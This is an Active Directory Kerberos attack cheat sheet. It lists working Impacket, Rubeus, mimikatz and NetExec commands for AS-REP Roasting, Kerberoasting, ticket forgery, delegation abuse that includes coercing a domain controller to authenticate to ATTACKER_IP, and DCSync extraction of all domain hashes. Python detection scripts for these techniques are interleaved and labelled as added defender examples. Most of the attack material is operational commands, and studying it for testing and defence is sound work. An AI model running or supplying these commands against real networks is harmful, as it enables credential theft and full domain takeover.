
Kerberos Attacks

aka AS-REP Roasting, Kerberoasting, Golden Ticket, Silver Ticket, Pass-the-Ticket

Kerberos attack toolkit: AS-REP Roasting, Kerberoasting, Pass-the-Ticket, Overpass-the-Hash, Golden and Silver tickets, unconstrained/constrained/RBCD delegation abuse, and Bronze Bit. Impacket + Rubeus reference.

Ports

Port  Proto  Notes
88    tcp    Kerberos — all ticket operations

Fingerprint

  • Port 88 open = Kerberos KDC (Domain Controller)
  • TGT format: Base64 blob starting with DOIFXXX (Rubeus) or ccache file (Impacket)

Key files

Path                    Holds                                                                  Sensitive
NTDS.dit + SYSTEM hive  all domain hashes (DCSync extracts without touching the file)          sensitive
lsass.exe memory        Kerberos tickets, NT hashes, plaintext creds (Windows older than 8.1)  sensitive

Exploitation primitives

  • AS-REP Roast: crack TGT for users with DONT_REQ_PREAUTH set (hashcat -m 18200)
  • Kerberoast: any domain user can request TGS for any SPN; crack offline (hashcat -m 13100)
  • Golden ticket: forge TGT from krbtgt hash → any user, any group, 10-year validity
  • Silver ticket: forge TGS for a specific service using service account hash
  • Unconstrained delegation: coerce privileged auth to capture TGT via Printer Bug / PetitPotam

AS-REP Roasting

Accounts with DONT_REQ_PREAUTH set get an AS-REP from the KDC without first proving knowledge of the password. Part of that reply is encrypted with a key derived from the account's password, so it can be cracked offline.

Enumerate targets

# Impacket
GetNPUsers.py domain.local/ -no-pass -usersfile users.txt -dc-ip DC_IP
GetNPUsers.py domain.local/user:pass -request -format hashcat -dc-ip DC_IP

# NetExec (nxc, the CrackMapExec successor)
nxc ldap DC_IP -u user -p pass --asreproast asrep.txt

# PowerView (on Windows)
Get-DomainUser -KerberosPreauthNotRequired | select samaccountname

Crack

hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

Kerberoasting

Any authenticated domain user can request a TGS for any account with a Service Principal Name (SPN). The TGS is encrypted with the service account’s password hash → crack offline.

Enumerate SPNs and request tickets

# Impacket
GetUserSPNs.py domain.local/user:pass -dc-ip DC_IP -request -outputfile tgs.txt

# NetExec (nxc)
nxc ldap DC_IP -u user -p pass --kerberoasting tgs.txt

# Rubeus (on Windows)
.\Rubeus.exe kerberoast /nowrap /outfile:tgs.txt

# Targeted (specific user)
.\Rubeus.exe kerberoast /user:sqlsvc /nowrap

Crack

hashcat -m 13100 tgs.txt /usr/share/wordlists/rockyou.txt
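
A defender-side check for the two roasting techniques above (AS-REP Roasting and Kerberoasting), added here as an example and not part of the original cheat sheet: it scans Security events 4768 and 4769 for the traces the tools leave, an RC4 (etype 0x17) AS-REP issued with no pre-authentication, and one client pulling RC4 service tickets for many distinct SPN accounts. The event list and the threshold are constructed assumptions; field names follow the Security log XML.

```python
# Added example, not from the original page: spot roasting activity in
# Windows Security events. Field names mirror the 4768/4769 XML fields
# (TargetUserName, IpAddress, TicketEncryptionType, PreAuthType, ServiceName).
from collections import defaultdict

RC4_HMAC = "0x17"            # etype roasting tools request because it cracks fastest
PREAUTH_NONE = "0"           # PreAuthType 0: the account has DONT_REQ_PREAUTH set
KERBEROAST_THRESHOLD = 5     # distinct SPN accounts per client; assumed tuning value

# Constructed sample events (not real log data)
EVENTS = [
    {"id": 4768, "user": "asrep_user", "ip": "10.0.0.5", "etype": "0x17", "preauth": "0"},
    {"id": 4768, "user": "alice", "ip": "10.0.0.7", "etype": "0x12", "preauth": "2"},
    {"id": 4769, "user": "alice", "ip": "10.0.0.7", "etype": "0x12", "service": "FILESRV$"},
] + [
    {"id": 4769, "user": "bob", "ip": "10.0.0.9", "etype": "0x17", "service": svc}
    for svc in ("sqlsvc", "websvc", "backupsvc", "exchsvc", "ftpsvc", "FILESRV$", "krbtgt")
]


def asrep_roast_indicators(events):
    """Accounts whose AS-REP was handed out with no pre-auth in RC4:
    exactly what GetNPUsers / --asreproast ask the KDC for."""
    return sorted({e["user"] for e in events
                   if e["id"] == 4768
                   and e["preauth"] == PREAUTH_NONE
                   and e["etype"] == RC4_HMAC})


def kerberoast_indicators(events, threshold=KERBEROAST_THRESHOLD):
    """Clients that pulled RC4 service tickets for >= threshold distinct
    user SPN accounts. Machine accounts ($, random 120-char passwords) and
    krbtgt (TGT renewals also log as 4769) are not practical targets."""
    per_client = defaultdict(set)
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4_HMAC:
            continue
        svc = e["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_client[(e["ip"], e["user"])].add(svc)
    return {client: sorted(spns) for client, spns in per_client.items()
            if len(spns) >= threshold}


if __name__ == "__main__":
    print("AS-REP roast candidates:", asrep_roast_indicators(EVENTS))
    print("Kerberoast candidates:", kerberoast_indicators(EVENTS))
```

Accounts that legitimately still use RC4 (or a single service that many clients hit) will show up too, so the etype filter and threshold need tuning per domain.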

Kerberoast without preauth (CWEE-style chaining)

Combine AS-REP Roasting + Kerberoasting:

# Use an ASREP-roastable account to request TGS for an SPN (no password needed)
.\Rubeus.exe kerberoast /nopreauth:asrep_user /spn:MSSQLSvc/sqlserver:1433 /domain:domain.local

Pass-the-Ticket (PTT)

Inject an existing Kerberos ticket (.ccache or Rubeus base64) into your session:

# Linux — set KRB5CCNAME environment variable
export KRB5CCNAME=/path/to/ticket.ccache
secretsdump.py -k -no-pass dc.domain.local

# Windows — Rubeus inject
.\Rubeus.exe ptt /ticket:BASE64_TICKET
klist  # verify ticket is loaded

Overpass-the-Hash (PTK — Pass-the-Key)

Use an NT hash or AES key to obtain a Kerberos TGT (avoids NTLM entirely):

# Impacket (Linux)
getTGT.py domain.local/user -hashes :NThash -dc-ip DC_IP
export KRB5CCNAME=user.ccache
wmiexec.py -k -no-pass domain.local/user@target

# Rubeus (Windows)
.\Rubeus.exe asktgt /user:user /rc4:NThash /ptt
.\Rubeus.exe asktgt /user:user /aes256:AES256KEY /ptt

Golden Ticket

Requires the krbtgt hash (obtained via DCSync, domain admin session, or NTDS.dit dump).

Get krbtgt hash

# DCSync (requires replication rights)
secretsdump.py -just-dc-user krbtgt domain.local/administrator:pass@DC_IP
mimikatz: lsadump::dcsync /user:krbtgt

Forge the ticket

# Impacket (Linux)
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-XXXXX -domain domain.local -user-id 500 Administrator
export KRB5CCNAME=Administrator.ccache
wmiexec.py -k -no-pass domain.local/Administrator@target

# Rubeus (Windows)
.\Rubeus.exe golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXXXX /rc4:KRBTGT_HASH /ptt

# Mimikatz (Windows)
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXXXX /krbtgt:HASH /ptt

Silver Ticket

Forge a TGS for a specific service using the service account’s hash. No KDC contact required.

# Impacket
ticketer.py -nthash SERVICE_ACCOUNT_HASH -domain-sid S-1-5-21-XXXXX -domain domain.local -spn CIFS/target.domain.local Administrator
export KRB5CCNAME=Administrator.ccache

# Rubeus
.\Rubeus.exe silver /user:Administrator /service:cifs/target.domain.local /rc4:SERVICE_HASH /domain:domain.local /sid:S-1-5-21-XXXXX /ptt

# Mimikatz
kerberos::golden /user:Administrator /service:cifs /target:target.domain.local /rc4:SERVICE_HASH /sid:S-1-5-21-XXXXX /ptt
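
A correlation check for the Golden and Silver Ticket sections above, added here as an example and not part of the original cheat sheet: a forged TGT produces service-ticket requests (4769) with no TGT request (4768) for that user, and a forged TGS (which never touches the KDC) produces a Kerberos logon (4624) on the host with no 4769 for that host. The event list is constructed; times are minutes and the window is the default 10 h TGT lifetime; it assumes the logs of all DCs are merged into one list and that the service runs under the machine account, as CIFS does.

```python
# Added example, not from the original page: find tickets the KDC never issued.
# Assumes EVENTS holds the merged Security logs of every DC (4768/4769) plus
# the member host's logon events (4624); times are minutes since an epoch.
TICKET_LIFETIME_MIN = 10 * 60  # default MaxTicketAge

# Constructed sample events (not real log data)
EVENTS = [
    {"id": 4768, "t": 0,  "user": "alice", "service": "krbtgt"},
    {"id": 4769, "t": 5,  "user": "alice", "service": "FILESRV$"},
    {"id": 4624, "t": 6,  "user": "alice", "host": "FILESRV", "pkg": "Kerberos"},
    {"id": 4769, "t": 30, "user": "Administrator", "service": "DC01$"},  # no 4768 for this user
    {"id": 4624, "t": 40, "user": "Administrator", "host": "FILESRV", "pkg": "Kerberos"},  # no 4769
    {"id": 4624, "t": 41, "user": "bob", "host": "FILESRV", "pkg": "NTLM"},  # not Kerberos, ignored
]


def _issued_before(events, event_id, user, t, service=None, window=TICKET_LIFETIME_MIN):
    """True if the KDC logged event_id for user (optionally for service) in [t - window, t]."""
    return any(e["id"] == event_id and e["user"] == user
               and t - window <= e["t"] <= t
               and (service is None or e["service"] == service)
               for e in events)


def golden_ticket_suspects(events):
    """4769 requests whose user obtained no TGT from any DC within the
    ticket lifetime: the TGT that was presented was not issued here."""
    return [e for e in events
            if e["id"] == 4769 and not _issued_before(events, 4768, e["user"], e["t"])]


def silver_ticket_suspects(events):
    """Kerberos logons to a host for which no DC issued that user a service
    ticket (ServiceName = the host's machine account)."""
    return [e for e in events
            if e["id"] == 4624 and e["pkg"] == "Kerberos"
            and not _issued_before(events, 4769, e["user"], e["t"], service=e["host"] + "$")]


if __name__ == "__main__":
    for e in golden_ticket_suspects(EVENTS):
        print("possible forged TGT:", e["user"], "->", e["service"], "at", e["t"])
    for e in silver_ticket_suspects(EVENTS):
        print("possible forged TGS:", e["user"], "on", e["host"], "at", e["t"])
```

Renewed TGTs (4768 older than the window but inside MaxRenewAge) and a DC whose log is missing both produce false positives, so collect from every DC and widen the window to the domain's renewal lifetime before alerting.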

Unconstrained Delegation

Computers with TrustedForDelegation receive a copy of the TGT of any user that authenticates to them over Kerberos (it is forwarded inside the service ticket and cached in LSASS). Compromise that computer → capture DA TGT.

Find unconstrained delegation hosts

nxc ldap DC_IP -u user -p pass --trusted-for-delegation
Get-DomainComputer -Unconstrained | select dnshostname

Capture TGTs with Rubeus (on the compromised host)

.\Rubeus.exe monitor /interval:5 /targetuser:Administrator

Coerce DC authentication (Printer Bug)

# MS-RPRN SpoolSample
.\SpoolSample.exe DC_IP ATTACKER_IP  # Windows
python3 printerbug.py 'domain.local/user:pass'@DC_IP ATTACKER_IP  # Linux

Extract and use the TGT

.\Rubeus.exe ptt /ticket:BASE64_TGT

Constrained Delegation

Accounts allowed to delegate to specific SPNs, listed in msDS-AllowedToDelegateTo. If the account also has TrustedToAuthForDelegation (protocol transition), it can obtain a ticket for any user to itself via S4U2Self and forward it to the allowed SPN via S4U2Proxy.

Find constrained delegation accounts

nxc ldap DC_IP -u user -p pass --trusted-for-delegation  # also shows constrained
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select dnshostname, msds-allowedtodelegateto

S4U2Self + S4U2Proxy attack

# Rubeus — request a service ticket impersonating Administrator
.\Rubeus.exe s4u /user:constrained_svc /rc4:HASH /impersonateuser:Administrator /msdsspn:CIFS/target.domain.local /ptt

# Impacket
getST.py -spn cifs/target.domain.local -impersonate Administrator -dc-ip DC_IP domain.local/constrained_svc:pass
export KRB5CCNAME=Administrator.ccache

Resource-Based Constrained Delegation (RBCD)

Set msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer to allow a controlled account to delegate to it.

Requirements

  • Write access over the target computer object (GenericWrite, GenericAll or WriteDACL)
  • A computer account (or existing machine account) you control

Exploit

# 1. Create a fake computer account (if MachineAccountQuota > 0)
addcomputer.py -computer-name 'FAKEPC$' -computer-pass 'FakePass123!' domain.local/user:pass -dc-ip DC_IP

# 2. Set RBCD on the target computer
rbcd.py -delegate-from 'FAKEPC$' -delegate-to 'TARGET$' -action write domain.local/user:pass -dc-ip DC_IP

# 3. Get impersonation ticket
getST.py -spn cifs/TARGET.domain.local -impersonate Administrator -dc-ip DC_IP domain.local/'FAKEPC$:FakePass123!'
export KRB5CCNAME=Administrator.ccache

# 4. Use it
secretsdump.py -k -no-pass TARGET.domain.local
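
An audit of the settings the three delegation sections above (Unconstrained, Constrained, RBCD) rely on, added here as an example and not part of the original cheat sheet: it reads exported directory objects and lists non-DC unconstrained hosts, constrained accounts with their SPNs and protocol-transition flag, computers with an RBCD descriptor set, privileged accounts not marked sensitive, and whether MachineAccountQuota still allows the fake-computer step. The object records and the quota value are constructed; the bit values are the documented userAccountControl flags.

```python
# Added example, not from the original page: audit delegation exposure from an
# LDAP export. Records are constructed dicts keyed by LDAP attribute names;
# a real run would pull the same attributes over LDAP.
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained + protocol transition (S4U2Self for anyone)
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller: unconstrained there is by design

# Constructed sample objects (not real directory data); the RBCD value is a
# placeholder for the binary security descriptor, only its presence matters here.
OBJECTS = [
    {"name": "DC01$", "uac": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"name": "WEB01$", "uac": 0x1000 | TRUSTED_FOR_DELEGATION},
    {"name": "sqlsvc", "uac": 0x200 | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["CIFS/fs01.domain.local"]},
    {"name": "FS01$", "uac": 0x1000, "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},
    {"name": "Administrator", "uac": 0x200, "adminCount": 1},
    {"name": "backup_admin", "uac": 0x200 | NOT_DELEGATED, "adminCount": 1},
]
MACHINE_ACCOUNT_QUOTA = 10  # constructed ms-DS-MachineAccountQuota value (10 is the default)


def unconstrained_hosts(objects):
    """Non-DC accounts that cache every Kerberos caller's TGT."""
    return [o["name"] for o in objects
            if o["uac"] & TRUSTED_FOR_DELEGATION and not o["uac"] & SERVER_TRUST_ACCOUNT]


def constrained_accounts(objects):
    """(account, allowed SPNs, protocol transition enabled) per constrained entry."""
    return [(o["name"], o["msDS-AllowedToDelegateTo"], bool(o["uac"] & TRUSTED_TO_AUTH_FOR_DELEGATION))
            for o in objects if o.get("msDS-AllowedToDelegateTo")]


def rbcd_targets(objects):
    """Computers whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated."""
    return [o["name"] for o in objects if o.get("msDS-AllowedToActOnBehalfOfOtherIdentity")]


def delegatable_admins(objects):
    """Privileged accounts (adminCount=1) whose tickets any delegation path can reuse."""
    return [o["name"] for o in objects
            if o.get("adminCount") == 1 and not o["uac"] & NOT_DELEGATED]


def machine_account_quota_open(quota=MACHINE_ACCOUNT_QUOTA):
    """True while ordinary users may still create computer accounts."""
    return quota > 0
```

Membership of the Protected Users group gives the same protection as NOT_DELEGATED, so extend delegatable_admins to check memberOf if the export carries it.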

DCSync

Pull all domain hashes by impersonating a DC’s replication process. Requires Replicating Directory Changes All (or higher) rights.

# Impacket
secretsdump.py domain.local/user:pass@DC_IP -just-dc-ntlm
secretsdump.py -just-dc-user krbtgt domain.local/user:pass@DC_IP

# Mimikatz (on Windows, domain-joined)
mimikatz: lsadump::dcsync /domain:domain.local /user:Administrator
mimikatz: lsadump::dcsync /domain:domain.local /all /csv
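
A detection for the DCSync section above, added here as an example and not part of the original cheat sheet: it flags Security event 4662 entries that exercise the replication control-access rights from a principal that is not a domain controller. The three GUIDs are the documented replication extended rights; the event list and the DC allow-list are constructed.

```python
# Added example, not from the original page: flag DCSync-style replication
# requests in Security event 4662. DC_ACCOUNTS is a constructed allow-list;
# in practice derive it from the Domain Controllers OU.
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DC_ACCOUNTS = {"DC01$", "DC02$"}
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)

# Constructed sample 4662 events (not real log data); "properties" carries the
# event's Properties field, where each requested right appears as {GUID}.
EVENTS = [
    {"id": 4662, "subject": "DC02$", "object_type": "domainDNS",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "subject": "jdoe", "object_type": "domainDNS",
     "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "subject": "jdoe", "object_type": "user",
     "properties": "{00000000-0000-0000-0000-000000000000}"},  # placeholder, unrelated right
]


def replication_rights_in(properties):
    """Names of the replication rights present in a 4662 Properties string."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def dcsync_suspects(events, dc_accounts=DC_ACCOUNTS):
    """(subject, rights) for every 4662 that exercises replication rights
    from an account that is not a domain controller."""
    hits = []
    for e in events:
        if e["id"] != 4662 or e["subject"] in dc_accounts:
            continue
        rights = replication_rights_in(e["properties"])
        if rights:
            hits.append((e["subject"], rights))
    return hits


if __name__ == "__main__":
    for subject, rights in dcsync_suspects(EVENTS):
        print(f"DCSync-like access by {subject}: {', '.join(rights)}")
```

4662 is only written when "Audit Directory Service Access" is enabled on the DCs, and directory sync accounts (for example Azure AD Connect's) hold these rights legitimately and belong on the allow-list.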
